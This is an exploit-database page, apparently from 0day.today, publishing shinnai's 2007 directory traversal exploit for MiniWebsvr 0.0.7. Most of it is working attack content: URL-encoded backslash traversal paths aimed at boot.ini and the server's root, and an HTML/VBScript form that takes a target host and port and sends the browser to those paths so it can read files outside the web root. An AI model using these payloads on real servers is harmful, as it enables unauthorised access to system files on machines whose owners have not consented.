[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MiniWebsvr 0.0.7 Remote Directory Transversal Exploit

Author
shinnai
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8901
Category
remote exploits
Date add
10-04-2007
Platform
multiple
=====================================================
MiniWebsvr 0.0.7 Remote Directory Transversal Exploit
=====================================================

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

Host			Port
<input type=text name=txtIP value = "localhost">	<input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language='vbscript'>
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>



#  0day.today [2024-07-07]  #